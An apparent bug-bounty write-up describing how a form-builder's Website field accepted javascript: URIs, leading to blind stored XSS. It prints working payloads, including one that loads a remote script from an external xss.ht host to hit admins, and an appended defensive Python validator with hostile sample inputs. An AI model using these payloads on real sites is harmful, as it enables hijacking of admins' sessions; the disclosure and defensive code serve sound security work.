Hack Your Form - New vector for Blind XSS

Hello Pentesters,

I’m Youssef A. Mohamed aka GeneralEG
 
Security Researcher @CESPPA , Cyber Security Engineer @Squnity and SRT Member @Synack

  • Today I’m gonna share a juicy finding with you.

It's about bypassing a couple of filters to execute malicious JavaScript code easily and achieve a Blind Stored XSS.

“I found this issue in a lot of targets so, I will take one of these programs as an example.”

The program is private so let’s call it redacted.com

  • Recently I was testing this program and, after some recon, I found that the website offers a specific service (Create Forms).

How does this service work?
1) The creator user creates a form.
2) The creator user shares the link with a visitor.
3) The visitor fills in the form.
4) The submitted information is available to the form's creator at redacted.com/manager/{Form ID}/

So while testing the "Create form" functions, I found that there is a Website input.

I made a simple form.

Then I opened the form as a visitor.

At first I tried to bypass it in the basic style
(thinking that if I wrote website.com?" plus a payload, it would execute).

So, I entered:
https://example.com/?"%22"

( " + URL-encoded + HTML-entity-encoded )

Then opened the creator account to see what happened.

But unfortunately, the filter encoded the double quotes.
https://example.com"%22"

and I noticed that the link was rendered inside an <a> tag.

So, I decided to grab a cup of coffee :”D

  • After a few minutes of deep thinking over my coffee about how I would bypass this one,

I decided to start fuzzing this input in particular: {Enter Website}

While fuzzing, I noticed that the filter accepted test:https://example.com !

Then I tried javascript:https//evil.com
and it worked :D
“Evil loud laugh”

  • Now I was sure that there is XSS here,
    but it needs a real website merged with my payload, so I wrote this one:

javascript:x='http://x.c';alert('xss');//

Finally executed!

  • But wait, we want to make it a Blind XSS to attack the real admins (the best scenario).

So the final payload was:

javascript:eval('a=document.createElement(\'script\');a.src=\'https://generaleg.xss.ht\';document.body.appendChild(a)');s='https://s.com'

¯\_(ツ)_/¯

That’s it!

Notes:

  • 80% of my targets that have the Website input were vulnerable to the same scenario.
  • To make sure that your target is vulnerable to the same problem, you need to check a few things:

A. Check whether the website accepts other URI schemes, like javascript:https://generaleg0x01.com, or not.

B. Check whether the website renders your https://generaleg0x01.com inside an HTML 'a' tag or not.

  • In most similar situations, the same payload will work perfectly.
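As an added defensive counterpart to checks A and B (my own code, not the author's or the program's), assuming the form stores the Website value and later renders it inside an href: the value is normalised the way a browser normalises a URL, only http(s) schemes with a host are accepted, and the result is attribute-escaped before rendering. The constructed samples include the post's first probe, the test: and javascript: schemes it describes, and two extra cases (tab-split scheme, scheme-relative URL) that the same rule also covers.

```python
import html
from typing import Optional
from urllib.parse import urlsplit

# Schemes a "Website" field may legitimately carry; everything else is rejected.
ALLOWED_SCHEMES = {"http", "https"}

# Browsers strip leading/trailing C0 controls and spaces and drop ASCII
# tab/newline anywhere in the string before parsing (WHATWG URL parser),
# so "java<TAB>script:" is still a javascript: URL to the browser.
_EDGE_STRIP = "".join(map(chr, range(0x21)))
_INNER_DROP = {0x09: None, 0x0A: None, 0x0D: None}


def normalize_url(raw: str) -> str:
    """Apply the same whitespace cleanup a browser applies, so the check
    sees the URL the way the browser will."""
    return raw.strip(_EDGE_STRIP).translate(_INNER_DROP)


def validate_website(raw: str) -> Optional[str]:
    """Return a canonical absolute http(s) URL, or None if the value is
    unsafe to store as a link target (check A: scheme allowlist)."""
    parts = urlsplit(normalize_url(raw))
    if parts.scheme not in ALLOWED_SCHEMES:
        return None  # javascript:, data:, test:, or scheme-less "//host"
    if not parts.netloc:
        return None  # "https:" alone, nothing to link to
    return parts.geturl()


def render_link(raw: str) -> str:
    """Render the stored value as an <a> tag; quote=True escapes both quote
    characters so the value can never terminate the href attribute (check B)."""
    url = validate_website(raw)
    if url is None:
        return "<span>(invalid website)</span>"
    safe = html.escape(url, quote=True)
    return f'<a href="{safe}" rel="noopener noreferrer">{safe}</a>'


if __name__ == "__main__":
    # Constructed inputs: the post's first probe, then the scheme tricks it describes.
    for sample in ['https://example.com/?"%22"', "test:https://example.com",
                   "javascript:x='http://x.c';alert('xss');//", " java\tscript:void(0) ",
                   "//example.net"]:
        print(repr(sample), "->", render_link(sample))
```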

Timeline:
20 December, 2018: Report Submitted
25 December, 2018: Report Reviewed and Triaged
30 December, 2018: Report Resolved & $800 Bounty Awarded

Learned lessons:

  • Fuzz as much as you can.
  • Don't rely on a single technique to bypass the filter; try other techniques.

Happy Hacking!